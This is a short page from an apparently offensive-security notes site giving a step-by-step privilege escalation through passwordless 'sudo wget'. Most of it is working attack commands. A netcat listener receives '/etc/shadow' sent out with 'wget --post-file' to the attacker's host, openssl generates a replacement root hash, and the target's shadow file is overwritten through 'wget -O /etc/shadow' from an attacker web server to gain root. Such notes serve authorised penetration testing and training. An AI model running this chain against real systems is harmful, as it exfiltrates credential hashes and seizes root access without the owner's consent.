Exploit Notes

Sudo Wget Privilege Escalation

Last modified: 2023-02-05

Privilege Escalation

The "sudo wget" command may be vulnerable to privilege escalation (PrivEsc).

Investigation

sudo -l

(root) NOPASSWD: /usr/bin/wget

If we can execute "wget" as root, we may be able to escalate privileges.


Modify /etc/shadow

Get "/etc/shadow" and generate a new hash passwd, then set it to the shadow file, next upload it.
That changes the root password.

1. Get the Content of /etc/shadow

To see the content of /etc/shadow, we can use netcat listener.
So First, start a listener in local machine.

nc -lvnp 4444

In target machine, display the contents of the "/etc/shadow" to the local machine using the following command.

sudo /usr/bin/wget --post-file=/etc/shadow <local-ip> 4444

We should see the content in our local machine via netcat listener.
Copy the content.

2. Create a New Shadow File

We create a new shadow file in local. The shadow file will be stored into the target /etc/shadow later.

vim shadow.txt

In vim editor (or nano, vi, etc.), paste the content of /etc/shadow which we've copied in the previous section.

3. Create a New Root User Password and Add to Shadow File

Generate a new hash password for a new root user in local machine.

# -6: SHA512
openssl passwd -6 -salt 'salt' 'password'

Copy the generated password and paste it at the password of the root user into the "shadow.txt".
As a result, the contents of the "shadow.txt" should look like this:

root:$6$salt$IxDD...DCy.g.:18195:0:99999:7:::
...

4. Transfer the Content of the Shadow File

To put the shadow.txt into the target machine, start web server for hosting this file.

python3 -m http.server 8000

Download this file into the /etc/shadow in remote machine. To do that, we need to run it as root.

sudo /usr/bin/wget http://<local-ip>:8000/shadow.txt -O /etc/shadow 

Finally, you can switch to the root user with the password we've created.

su root

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.